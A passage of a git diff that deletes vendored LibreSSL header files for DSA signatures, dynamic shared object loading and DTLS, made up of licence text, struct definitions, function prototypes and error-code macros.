- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-/*
- * The DSS routines are based on patches supplied by
- * Steven Schoch <schoch@sheba.arc.nasa.gov>.  He basically did the
- * work and I have just tweaked them a little to fit into my
- * stylistic vision for SSLeay :-) */
-
-#ifndef HEADER_DSA_H
-#define HEADER_DSA_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_DSA
-#error DSA is disabled.
-#endif
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/crypto.h>
-#include <openssl/ossl_typ.h>
-
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#ifndef OPENSSL_NO_DH
-# include <openssl/dh.h>
-#endif
-#endif
-
-#ifndef OPENSSL_DSA_MAX_MODULUS_BITS
-# define OPENSSL_DSA_MAX_MODULUS_BITS	10000
-#endif
-
-#define DSA_FLAG_CACHE_MONT_P	0x01
-
-/* If this flag is set the DSA method is FIPS compliant and can be used
- * in FIPS mode. This is set in the validated module method. If an
- * application sets this flag in its own methods it is its reposibility
- * to ensure the result is compliant.
- */
-
-#define DSA_FLAG_FIPS_METHOD			0x0400
-
-/* If this flag is set the operations normally disabled in FIPS mode are
- * permitted it is then the applications responsibility to ensure that the
- * usage is compliant.
- */
-
-#define DSA_FLAG_NON_FIPS_ALLOW			0x0400
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Already defined in ossl_typ.h */
-/* typedef struct dsa_st DSA; */
-/* typedef struct dsa_method DSA_METHOD; */
-
-typedef struct DSA_SIG_st
-	{
-	BIGNUM *r;
-	BIGNUM *s;
-	} DSA_SIG;
-
-struct dsa_method
-	{
-	const char *name;
-	DSA_SIG * (*dsa_do_sign)(const unsigned char *dgst, int dlen, DSA *dsa);
-	int (*dsa_sign_setup)(DSA *dsa, BN_CTX *ctx_in, BIGNUM **kinvp,
-								BIGNUM **rp);
-	int (*dsa_do_verify)(const unsigned char *dgst, int dgst_len,
-			     DSA_SIG *sig, DSA *dsa);
-	int (*dsa_mod_exp)(DSA *dsa, BIGNUM *rr, BIGNUM *a1, BIGNUM *p1,
-			BIGNUM *a2, BIGNUM *p2, BIGNUM *m, BN_CTX *ctx,
-			BN_MONT_CTX *in_mont);
-	int (*bn_mod_exp)(DSA *dsa, BIGNUM *r, BIGNUM *a, const BIGNUM *p,
-				const BIGNUM *m, BN_CTX *ctx,
-				BN_MONT_CTX *m_ctx); /* Can be null */
-	int (*init)(DSA *dsa);
-	int (*finish)(DSA *dsa);
-	int flags;
-	char *app_data;
-	/* If this is non-NULL, it is used to generate DSA parameters */
-	int (*dsa_paramgen)(DSA *dsa, int bits,
-			const unsigned char *seed, int seed_len,
-			int *counter_ret, unsigned long *h_ret,
-			BN_GENCB *cb);
-	/* If this is non-NULL, it is used to generate DSA keys */
-	int (*dsa_keygen)(DSA *dsa);
-	};
-
-struct dsa_st
-	{
-	/* This first variable is used to pick up errors where
-	 * a DSA is passed instead of of a EVP_PKEY */
-	int pad;
-	long version;
-	int write_params;
-	BIGNUM *p;
-	BIGNUM *q;	/* == 20 */
-	BIGNUM *g;
-
-	BIGNUM *pub_key;  /* y public key */
-	BIGNUM *priv_key; /* x private key */
-
-	BIGNUM *kinv;	/* Signing pre-calc */
-	BIGNUM *r;	/* Signing pre-calc */
-
-	int flags;
-	/* Normally used to cache montgomery values */
-	BN_MONT_CTX *method_mont_p;
-	int references;
-	CRYPTO_EX_DATA ex_data;
-	const DSA_METHOD *meth;
-	/* functional reference if 'meth' is ENGINE-provided */
-	ENGINE *engine;
-	};
-
-DSA *d2i_DSAparams_bio(BIO *bp, DSA **a);
-int i2d_DSAparams_bio(BIO *bp, DSA *a);
-DSA *d2i_DSAparams_fp(FILE *fp, DSA **a);
-int i2d_DSAparams_fp(FILE *fp, DSA *a);
-
-DSA *DSAparams_dup(DSA *x);
-DSA_SIG * DSA_SIG_new(void);
-void	DSA_SIG_free(DSA_SIG *a);
-int	i2d_DSA_SIG(const DSA_SIG *a, unsigned char **pp);
-DSA_SIG * d2i_DSA_SIG(DSA_SIG **v, const unsigned char **pp, long length);
-
-DSA_SIG * DSA_do_sign(const unsigned char *dgst,int dlen,DSA *dsa);
-int	DSA_do_verify(const unsigned char *dgst,int dgst_len,
-		      DSA_SIG *sig,DSA *dsa);
-
-const DSA_METHOD *DSA_OpenSSL(void);
-
-void	DSA_set_default_method(const DSA_METHOD *);
-const DSA_METHOD *DSA_get_default_method(void);
-int	DSA_set_method(DSA *dsa, const DSA_METHOD *);
-
-DSA *	DSA_new(void);
-DSA *	DSA_new_method(ENGINE *engine);
-void	DSA_free(DSA *r);
-/* "up" the DSA object's reference count */
-int	DSA_up_ref(DSA *r);
-int	DSA_size(const DSA *);
-	/* next 4 return -1 on error */
-int	DSA_sign_setup( DSA *dsa,BN_CTX *ctx_in,BIGNUM **kinvp,BIGNUM **rp);
-int	DSA_sign(int type,const unsigned char *dgst,int dlen,
-		unsigned char *sig, unsigned int *siglen, DSA *dsa);
-int	DSA_verify(int type,const unsigned char *dgst,int dgst_len,
-		const unsigned char *sigbuf, int siglen, DSA *dsa);
-int DSA_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-	     CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int DSA_set_ex_data(DSA *d, int idx, void *arg);
-void *DSA_get_ex_data(DSA *d, int idx);
-
-DSA *d2i_DSAPublicKey(DSA **a, const unsigned char **pp, long length);
-int i2d_DSAPublicKey(const DSA *a, unsigned char **pp);
-extern const ASN1_ITEM DSAPublicKey_it;
-
-DSA *d2i_DSAPrivateKey(DSA **a, const unsigned char **pp, long length);
-int i2d_DSAPrivateKey(const DSA *a, unsigned char **pp);
-extern const ASN1_ITEM DSAPrivateKey_it;
-
-DSA *d2i_DSAparams(DSA **a, const unsigned char **pp, long length);
-int i2d_DSAparams(const DSA *a,unsigned char **pp);
-extern const ASN1_ITEM DSAparams_it;
-
-/* Deprecated version */
-#ifndef OPENSSL_NO_DEPRECATED
-DSA *	DSA_generate_parameters(int bits,
-		unsigned char *seed,int seed_len,
-		int *counter_ret, unsigned long *h_ret,void
-		(*callback)(int, int, void *),void *cb_arg);
-#endif /* !defined(OPENSSL_NO_DEPRECATED) */
-
-/* New version */
-int	DSA_generate_parameters_ex(DSA *dsa, int bits,
-		const unsigned char *seed,int seed_len,
-		int *counter_ret, unsigned long *h_ret, BN_GENCB *cb);
-
-int	DSA_generate_key(DSA *a);
-
-#ifndef OPENSSL_NO_BIO
-int	DSAparams_print(BIO *bp, const DSA *x);
-int	DSA_print(BIO *bp, const DSA *x, int off);
-#endif
-int	DSAparams_print_fp(FILE *fp, const DSA *x);
-int	DSA_print_fp(FILE *bp, const DSA *x, int off);
-
-#define DSS_prime_checks 50
-/* Primality test according to FIPS PUB 186[-1], Appendix 2.1:
- * 50 rounds of Rabin-Miller */
-#define DSA_is_prime(n, callback, cb_arg) \
-	BN_is_prime(n, DSS_prime_checks, callback, NULL, cb_arg)
-
-#ifndef OPENSSL_NO_DH
-/* Convert DSA structure (key or just parameters) into DH structure
- * (be careful to avoid small subgroup attacks when using this!) */
-DH *DSA_dup_DH(const DSA *r);
-#endif
-
-#define EVP_PKEY_CTX_set_dsa_paramgen_bits(ctx, nbits) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DSA, EVP_PKEY_OP_PARAMGEN, \
-				EVP_PKEY_CTRL_DSA_PARAMGEN_BITS, nbits, NULL)
-
-#define	EVP_PKEY_CTRL_DSA_PARAMGEN_BITS		(EVP_PKEY_ALG_CTRL + 1)
-#define	EVP_PKEY_CTRL_DSA_PARAMGEN_Q_BITS	(EVP_PKEY_ALG_CTRL + 2)
-#define	EVP_PKEY_CTRL_DSA_PARAMGEN_MD		(EVP_PKEY_ALG_CTRL + 3)
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_DSA_strings(void);
-
-/* Error codes for the DSA functions. */
-
-/* Function codes. */
-#define DSA_F_D2I_DSA_SIG				 110
-#define DSA_F_DO_DSA_PRINT				 104
-#define DSA_F_DSAPARAMS_PRINT				 100
-#define DSA_F_DSAPARAMS_PRINT_FP			 101
-#define DSA_F_DSA_DO_SIGN				 112
-#define DSA_F_DSA_DO_VERIFY				 113
-#define DSA_F_DSA_GENERATE_KEY				 124
-#define DSA_F_DSA_GENERATE_PARAMETERS_EX		 123
-#define DSA_F_DSA_NEW_METHOD				 103
-#define DSA_F_DSA_PARAM_DECODE				 119
-#define DSA_F_DSA_PRINT_FP				 105
-#define DSA_F_DSA_PRIV_DECODE				 115
-#define DSA_F_DSA_PRIV_ENCODE				 116
-#define DSA_F_DSA_PUB_DECODE				 117
-#define DSA_F_DSA_PUB_ENCODE				 118
-#define DSA_F_DSA_SIGN					 106
-#define DSA_F_DSA_SIGN_SETUP				 107
-#define DSA_F_DSA_SIG_NEW				 109
-#define DSA_F_DSA_SIG_PRINT				 125
-#define DSA_F_DSA_VERIFY				 108
-#define DSA_F_I2D_DSA_SIG				 111
-#define DSA_F_OLD_DSA_PRIV_DECODE			 122
-#define DSA_F_PKEY_DSA_CTRL				 120
-#define DSA_F_PKEY_DSA_KEYGEN				 121
-#define DSA_F_SIG_CB					 114
-
-/* Reason codes. */
-#define DSA_R_BAD_Q_VALUE				 102
-#define DSA_R_BN_DECODE_ERROR				 108
-#define DSA_R_BN_ERROR					 109
-#define DSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE		 100
-#define DSA_R_DECODE_ERROR				 104
-#define DSA_R_INVALID_DIGEST_TYPE			 106
-#define DSA_R_MISSING_PARAMETERS			 101
-#define DSA_R_MODULUS_TOO_LARGE				 103
-#define DSA_R_NEED_NEW_SETUP_VALUES			 110
-#define DSA_R_NON_FIPS_DSA_METHOD			 111
-#define DSA_R_NO_PARAMETERS_SET				 107
-#define DSA_R_PARAMETER_ENCODING_ERROR			 105
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/dso.h b/thirdparty/libressl/include/openssl/dso.h
deleted file mode 100644
index 6c982c9..0000000
--- a/thirdparty/libressl/include/openssl/dso.h
+++ /dev/null
@@ -1,386 +0,0 @@
-/* $OpenBSD: dso.h,v 1.12 2016/03/15 20:50:22 krw Exp $ */
-/* Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL
- * project 2000.
- */
-/* ====================================================================
- * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_DSO_H
-#define HEADER_DSO_H
-
-#include <openssl/crypto.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-/* These values are used as commands to DSO_ctrl() */
-#define DSO_CTRL_GET_FLAGS	1
-#define DSO_CTRL_SET_FLAGS	2
-#define DSO_CTRL_OR_FLAGS	3
-
-/* By default, DSO_load() will translate the provided filename into a form
- * typical for the platform (more specifically the DSO_METHOD) using the
- * dso_name_converter function of the method. Eg. win32 will transform "blah"
- * into "blah.dll", and dlfcn will transform it into "libblah.so". The
- * behaviour can be overridden by setting the name_converter callback in the DSO
- * object (using DSO_set_name_converter()). This callback could even utilise
- * the DSO_METHOD's converter too if it only wants to override behaviour for
- * one or two possible DSO methods. However, the following flag can be set in a
- * DSO to prevent *any* native name-translation at all - eg. if the caller has
- * prompted the user for a path to a driver library so the filename should be
- * interpreted as-is. */
-#define DSO_FLAG_NO_NAME_TRANSLATION		0x01
-/* An extra flag to give if only the extension should be added as
- * translation.  This is obviously only of importance on Unix and
- * other operating systems where the translation also may prefix
- * the name with something, like 'lib', and ignored everywhere else.
- * This flag is also ignored if DSO_FLAG_NO_NAME_TRANSLATION is used
- * at the same time. */
-#define DSO_FLAG_NAME_TRANSLATION_EXT_ONLY	0x02
-
-/* The following flag controls the translation of symbol names to upper
- * case.  This is currently only being implemented for OpenVMS.
- */
-#define DSO_FLAG_UPCASE_SYMBOL			0x10
-
-/* This flag loads the library with public symbols.
- * Meaning: The exported symbols of this library are public
- * to all libraries loaded after this library.
- * At the moment only implemented in unix.
- */
-#define DSO_FLAG_GLOBAL_SYMBOLS			0x20
-
-
-typedef void (*DSO_FUNC_TYPE)(void);
-
-typedef struct dso_st DSO;
-
-/* The function prototype used for method functions (or caller-provided
- * callbacks) that transform filenames. They are passed a DSO structure pointer
- * (or NULL if they are to be used independantly of a DSO object) and a
- * filename to transform. They should either return NULL (if there is an error
- * condition) or a newly allocated string containing the transformed form that
- * the caller will need to free with free() when done. */
-typedef char* (*DSO_NAME_CONVERTER_FUNC)(DSO *, const char *);
-/* The function prototype used for method functions (or caller-provided
- * callbacks) that merge two file specifications. They are passed a
- * DSO structure pointer (or NULL if they are to be used independantly of
- * a DSO object) and two file specifications to merge. They should
- * either return NULL (if there is an error condition) or a newly allocated
- * string containing the result of merging that the caller will need
- * to free with free() when done.
- * Here, merging means that bits and pieces are taken from each of the
- * file specifications and added together in whatever fashion that is
- * sensible for the DSO method in question.  The only rule that really
- * applies is that if the two specification contain pieces of the same
- * type, the copy from the first string takes priority.  One could see
- * it as the first specification is the one given by the user and the
- * second being a bunch of defaults to add on if they're missing in the
- * first. */
-typedef char* (*DSO_MERGER_FUNC)(DSO *, const char *, const char *);
-
-typedef struct dso_meth_st {
-	const char *name;
-	/* Loads a shared library, NB: new DSO_METHODs must ensure that a
-	 * successful load populates the loaded_filename field, and likewise a
-	 * successful unload frees and NULLs it out. */
-	int (*dso_load)(DSO *dso);
-	/* Unloads a shared library */
-	int (*dso_unload)(DSO *dso);
-	/* Binds a variable */
-	void *(*dso_bind_var)(DSO *dso, const char *symname);
-	/* Binds a function - assumes a return type of DSO_FUNC_TYPE.
-	 * This should be cast to the real function prototype by the
-	 * caller. Platforms that don't have compatible representations
-	 * for different prototypes (this is possible within ANSI C)
-	 * are highly unlikely to have shared libraries at all, let
-	 * alone a DSO_METHOD implemented for them. */
-	DSO_FUNC_TYPE (*dso_bind_func)(DSO *dso, const char *symname);
-
-	/* The generic (yuck) "ctrl()" function. NB: Negative return
-	 * values (rather than zero) indicate errors. */
-	long (*dso_ctrl)(DSO *dso, int cmd, long larg, void *parg);
-	/* The default DSO_METHOD-specific function for converting filenames to
-	 * a canonical native form. */
-	DSO_NAME_CONVERTER_FUNC dso_name_converter;
-	/* The default DSO_METHOD-specific function for converting filenames to
-	 * a canonical native form. */
-	DSO_MERGER_FUNC dso_merger;
-
-	/* [De]Initialisation handlers. */
-	int (*init)(DSO *dso);
-	int (*finish)(DSO *dso);
-
-	/* Return pathname of the module containing location */
-	int (*pathbyaddr)(void *addr, char *path, int sz);
-	/* Perform global symbol lookup, i.e. among *all* modules */
-	void *(*globallookup)(const char *symname);
-} DSO_METHOD;
-
-/**********************************************************************/
-/* The low-level handle type used to refer to a loaded shared library */
-
-struct dso_st {
-	DSO_METHOD *meth;
-	/* Standard dlopen uses a (void *). Win32 uses a HANDLE. VMS
-	 * doesn't use anything but will need to cache the filename
-	 * for use in the dso_bind handler. All in all, let each
-	 * method control its own destiny. "Handles" and such go in
-	 * a STACK. */
-	STACK_OF(void) *meth_data;
-	int references;
-	int flags;
-	/* For use by applications etc ... use this for your bits'n'pieces,
-	 * don't touch meth_data! */
-	CRYPTO_EX_DATA ex_data;
-	/* If this callback function pointer is set to non-NULL, then it will
-	 * be used in DSO_load() in place of meth->dso_name_converter. NB: This
-	 * should normally set using DSO_set_name_converter(). */
-	DSO_NAME_CONVERTER_FUNC name_converter;
-	/* If this callback function pointer is set to non-NULL, then it will
-	 * be used in DSO_load() in place of meth->dso_merger. NB: This
-	 * should normally set using DSO_set_merger(). */
-	DSO_MERGER_FUNC merger;
-	/* This is populated with (a copy of) the platform-independant
-	 * filename used for this DSO. */
-	char *filename;
-	/* This is populated with (a copy of) the translated filename by which
-	 * the DSO was actually loaded. It is NULL iff the DSO is not currently
-	 * loaded. NB: This is here because the filename translation process
-	 * may involve a callback being invoked more than once not only to
-	 * convert to a platform-specific form, but also to try different
-	 * filenames in the process of trying to perform a load. As such, this
-	 * variable can be used to indicate (a) whether this DSO structure
-	 * corresponds to a loaded library or not, and (b) the filename with
-	 * which it was actually loaded. */
-	char *loaded_filename;
-};
-
-
-DSO *	DSO_new(void);
-DSO *	DSO_new_method(DSO_METHOD *method);
-int	DSO_free(DSO *dso);
-int	DSO_flags(DSO *dso);
-int	DSO_up_ref(DSO *dso);
-long	DSO_ctrl(DSO *dso, int cmd, long larg, void *parg);
-
-/* This function sets the DSO's name_converter callback. If it is non-NULL,
- * then it will be used instead of the associated DSO_METHOD's function. If
- * oldcb is non-NULL then it is set to the function pointer value being
- * replaced. Return value is non-zero for success. */
-int	DSO_set_name_converter(DSO *dso, DSO_NAME_CONVERTER_FUNC cb,
-	    DSO_NAME_CONVERTER_FUNC *oldcb);
-/* These functions can be used to get/set the platform-independant filename
- * used for a DSO. NB: set will fail if the DSO is already loaded. */
-const char *DSO_get_filename(DSO *dso);
-int	DSO_set_filename(DSO *dso, const char *filename);
-/* This function will invoke the DSO's name_converter callback to translate a
- * filename, or if the callback isn't set it will instead use the DSO_METHOD's
- * converter. If "filename" is NULL, the "filename" in the DSO itself will be
- * used. If the DSO_FLAG_NO_NAME_TRANSLATION flag is set, then the filename is
- * simply duplicated. NB: This function is usually called from within a
- * DSO_METHOD during the processing of a DSO_load() call, and is exposed so that
- * caller-created DSO_METHODs can do the same thing. A non-NULL return value
- * will need to be free()'d. */
-char	*DSO_convert_filename(DSO *dso, const char *filename);
-/* This function will invoke the DSO's merger callback to merge two file
- * specifications, or if the callback isn't set it will instead use the
- * DSO_METHOD's merger.  A non-NULL return value will need to be
- * free()'d. */
-char	*DSO_merge(DSO *dso, const char *filespec1, const char *filespec2);
-/* If the DSO is currently loaded, this returns the filename that it was loaded
- * under, otherwise it returns NULL. So it is also useful as a test as to
- * whether the DSO is currently loaded. NB: This will not necessarily return
- * the same value as DSO_convert_filename(dso, dso->filename), because the
- * DSO_METHOD's load function may have tried a variety of filenames (with
- * and/or without the aid of the converters) before settling on the one it
- * actually loaded. */
-const char *DSO_get_loaded_filename(DSO *dso);
-
-void	DSO_set_default_method(DSO_METHOD *meth);
-DSO_METHOD *DSO_get_default_method(void);
-DSO_METHOD *DSO_get_method(DSO *dso);
-DSO_METHOD *DSO_set_method(DSO *dso, DSO_METHOD *meth);
-
-/* The all-singing all-dancing load function, you normally pass NULL
- * for the first and third parameters. Use DSO_up and DSO_free for
- * subsequent reference count handling. Any flags passed in will be set
- * in the constructed DSO after its init() function but before the
- * load operation. If 'dso' is non-NULL, 'flags' is ignored. */
-DSO *DSO_load(DSO *dso, const char *filename, DSO_METHOD *meth, int flags);
-
-/* This function binds to a variable inside a shared library. */
-void *DSO_bind_var(DSO *dso, const char *symname);
-
-/* This function binds to a function inside a shared library. */
-DSO_FUNC_TYPE DSO_bind_func(DSO *dso, const char *symname);
-
-/* This method is the default, but will beg, borrow, or steal whatever
- * method should be the default on any particular platform (including
- * DSO_METH_null() if necessary). */
-DSO_METHOD *DSO_METHOD_openssl(void);
-
-/* This method is defined for all platforms - if a platform has no
- * DSO support then this will be the only method! */
-DSO_METHOD *DSO_METHOD_null(void);
-
-/* If DSO_DLFCN is defined, the standard dlfcn.h-style functions
- * (dlopen, dlclose, dlsym, etc) will be used and incorporated into
- * this method. If not, this method will return NULL. */
-DSO_METHOD *DSO_METHOD_dlfcn(void);
-
-/* This function writes null-terminated pathname of DSO module
- * containing 'addr' into 'sz' large caller-provided 'path' and
- * returns the number of characters [including trailing zero]
- * written to it. If 'sz' is 0 or negative, 'path' is ignored and
- * required amount of charachers [including trailing zero] to
- * accommodate pathname is returned. If 'addr' is NULL, then
- * pathname of cryptolib itself is returned. Negative or zero
- * return value denotes error.
- */
-int DSO_pathbyaddr(void *addr, char *path, int sz);
-
-/* This function should be used with caution! It looks up symbols in
- * *all* loaded modules and if module gets unloaded by somebody else
- * attempt to dereference the pointer is doomed to have fatal
- * consequences. Primary usage for this function is to probe *core*
- * system functionality, e.g. check if getnameinfo(3) is available
- * at run-time without bothering about OS-specific details such as
- * libc.so.versioning or where does it actually reside: in libc
- * itself or libsocket. */
-void *DSO_global_lookup(const char *name);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_DSO_strings(void);
-
-/* Error codes for the DSO functions. */
-
-/* Function codes. */
-#define DSO_F_BEOS_BIND_FUNC				 144
-#define DSO_F_BEOS_BIND_VAR				 145
-#define DSO_F_BEOS_LOAD					 146
-#define DSO_F_BEOS_NAME_CONVERTER			 147
-#define DSO_F_BEOS_UNLOAD				 148
-#define DSO_F_DLFCN_BIND_FUNC				 100
-#define DSO_F_DLFCN_BIND_VAR				 101
-#define DSO_F_DLFCN_LOAD				 102
-#define DSO_F_DLFCN_MERGER				 130
-#define DSO_F_DLFCN_NAME_CONVERTER			 123
-#define DSO_F_DLFCN_UNLOAD				 103
-#define DSO_F_DL_BIND_FUNC				 104
-#define DSO_F_DL_BIND_VAR				 105
-#define DSO_F_DL_LOAD					 106
-#define DSO_F_DL_MERGER					 131
-#define DSO_F_DL_NAME_CONVERTER				 124
-#define DSO_F_DL_UNLOAD					 107
-#define DSO_F_DSO_BIND_FUNC				 108
-#define DSO_F_DSO_BIND_VAR				 109
-#define DSO_F_DSO_CONVERT_FILENAME			 126
-#define DSO_F_DSO_CTRL					 110
-#define DSO_F_DSO_FREE					 111
-#define DSO_F_DSO_GET_FILENAME				 127
-#define DSO_F_DSO_GET_LOADED_FILENAME			 128
-#define DSO_F_DSO_GLOBAL_LOOKUP				 139
-#define DSO_F_DSO_LOAD					 112
-#define DSO_F_DSO_MERGE					 132
-#define DSO_F_DSO_NEW_METHOD				 113
-#define DSO_F_DSO_PATHBYADDR				 140
-#define DSO_F_DSO_SET_FILENAME				 129
-#define DSO_F_DSO_SET_NAME_CONVERTER			 122
-#define DSO_F_DSO_UP_REF				 114
-#define DSO_F_GLOBAL_LOOKUP_FUNC			 138
-#define DSO_F_PATHBYADDR				 137
-#define DSO_F_VMS_BIND_SYM				 115
-#define DSO_F_VMS_LOAD					 116
-#define DSO_F_VMS_MERGER				 133
-#define DSO_F_VMS_UNLOAD				 117
-#define DSO_F_WIN32_BIND_FUNC				 118
-#define DSO_F_WIN32_BIND_VAR				 119
-#define DSO_F_WIN32_GLOBALLOOKUP			 142
-#define DSO_F_WIN32_GLOBALLOOKUP_FUNC			 143
-#define DSO_F_WIN32_JOINER				 135
-#define DSO_F_WIN32_LOAD				 120
-#define DSO_F_WIN32_MERGER				 134
-#define DSO_F_WIN32_NAME_CONVERTER			 125
-#define DSO_F_WIN32_PATHBYADDR				 141
-#define DSO_F_WIN32_SPLITTER				 136
-#define DSO_F_WIN32_UNLOAD				 121
-
-/* Reason codes. */
-#define DSO_R_CTRL_FAILED				 100
-#define DSO_R_DSO_ALREADY_LOADED			 110
-#define DSO_R_EMPTY_FILE_STRUCTURE			 113
-#define DSO_R_FAILURE					 114
-#define DSO_R_FILENAME_TOO_BIG				 101
-#define DSO_R_FINISH_FAILED				 102
-#define DSO_R_INCORRECT_FILE_SYNTAX			 115
-#define DSO_R_LOAD_FAILED				 103
-#define DSO_R_NAME_TRANSLATION_FAILED			 109
-#define DSO_R_NO_FILENAME				 111
-#define DSO_R_NO_FILE_SPECIFICATION			 116
-#define DSO_R_NULL_HANDLE				 104
-#define DSO_R_SET_FILENAME_FAILED			 112
-#define DSO_R_STACK_ERROR				 105
-#define DSO_R_SYM_FAILURE				 106
-#define DSO_R_UNLOAD_FAILED				 107
-#define DSO_R_UNSUPPORTED				 108
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/dtls1.h b/thirdparty/libressl/include/openssl/dtls1.h
deleted file mode 100644
index 31ba065..0000000
--- a/thirdparty/libressl/include/openssl/dtls1.h
+++ /dev/null
@@ -1,190 +0,0 @@
-/* $OpenBSD: dtls1.h,v 1.21 2017/01/22 07:16:39 beck Exp $ */
-/*
- * DTLS implementation written by Nagendra Modadugu
- * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
- */
-/* ====================================================================
- * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
